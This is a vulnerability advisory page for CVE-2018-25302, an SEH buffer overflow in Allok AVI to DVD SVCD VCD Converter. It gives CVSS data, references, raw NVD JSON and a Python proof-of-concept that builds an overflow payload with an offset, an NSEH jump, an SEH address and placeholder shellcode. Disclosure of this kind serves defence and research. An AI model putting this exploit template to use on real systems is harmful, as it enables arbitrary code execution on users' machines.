CVE-2018-25302

Description

Allok AVI to DVD SVCD VCD Converter 4.0.1217 contains a structured exception handling (SEH) based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Name field. Attackers can craft a payload with junk data, NSEH bypass, SEH handler address, and shellcode that triggers the overflow when pasted into the License Name field and the Register button is clicked, resulting in code execution.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Allok AVI to DVD SVCD VCD Converter 4.0.1217

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import sys

# Exploit for CVE-2018-25302
# SEH Buffer Overflow in Allok AVI to DVD SVCD VCD Converter 4.0.1217

def generate_payload():
    # Offset to reach the SEH handler
    offset = 4132
    junk = b"A" * offset

    # NSEH (Next SEH) - short jump to shellcode (6 bytes forward)
    nseh = b"\xeb\x06\x90\x90"

    # SEH (Structured Exception Handler) - Address of pop pop ret
    # Replace with a valid address from a non-ASLR module (e.g., 0x1001e201)
    seh = b"\x01\xe2\x01\x10"

    # Shellcode (Example: calc.exe)
    # This is a placeholder for actual shellcode
    shellcode = b"\xcc" * 300

    # Combine all parts
    payload = junk + nseh + seh + shellcode
    return payload

if __name__ == "__main__":
    try:
        exploit = generate_payload()
        # In a real scenario, this string would be pasted into the License Name field
        print("[+] Exploit generated successfully.")
        print(f"[+] Payload length: {len(exploit)} bytes")
    except Exception as e:
        print(f"[-] Error generating payload: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25302
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25302
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25302/
[4] VulDB https://vuldb.com/cve/CVE-2018-25302
[5] http://www.alloksoft.com/
[6] https://www.exploit-db.com/exploits/44549
[7] https://www.vulncheck.com/advisories/allok-avi-to-dvd-svcd-vcd-converter-buffer-overflow-seh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25302", "sourceIdentifier": "[email protected]", "published": "2026-04-29T20:16:25.477", "lastModified": "2026-04-29T21:22:20.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Allok AVI to DVD SVCD VCD Converter 4.0.1217 contains a structured exception handling (SEH) based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying a malicious string in the License Name field. Attackers can craft a payload with junk data, NSEH bypass, SEH handler address, and shellcode that triggers the overflow when pasted into the License Name field and the Register button is clicked, resulting in code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "http://www.alloksoft.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/44549", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/allok-avi-to-dvd-svcd-vcd-converter-buffer-overflow-seh", "source": "[email protected]"}]}}